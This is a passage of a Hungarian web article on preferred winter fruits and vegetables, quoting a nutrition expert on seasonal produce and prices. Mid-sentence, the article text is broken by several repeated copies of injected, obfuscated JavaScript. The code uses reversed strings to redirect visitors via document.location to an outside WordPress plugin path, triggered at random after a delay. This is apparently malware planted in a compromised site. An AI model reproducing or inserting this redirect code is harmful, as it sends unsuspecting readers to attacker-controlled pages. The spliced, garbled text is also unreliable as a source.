Megkérdezések alapján, gyümölcsökből banánt, narancsot, almát, a zöldségek közül kelbimbót vagy savanyú káposztát fogyasztanak a legszívesebben télen. A szezonális és hazai alapanyagokra teszi a voksát a táplálkozástudományi szakértő. Papp Andrea kifejtette, egyrészt a környezeti terhek miatt is fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, hogy mit választunk, hiszen a nem szezonális zöldségeknek és gyümölcsöknek az előállítását fűtött fóliasátrakban végzik, emellett pedig speciális tápanyagigényük is van, ami a pénztárcánknak sem tesz jót. „Ilyenkor akár háromszor-négyszer annyiba kerül a paradicsom vagy a paprika, mint szezonban. Nem leszünk kevésbé egészségesek attól, hogy paprikát és paradicsomot fogyasztunk ilyenkor, viszont tévhit, hogy nincs C-vitamin-tartalom a szezonális gyümölcsökben és zöldségekben”. Példaként említette,…
A cikk folytatódik: http://lelkielet.co.hu/fitten/2018/01/15/gondoskodj-a-teli-vitaminpotlasrol-.html
- Hirdetés -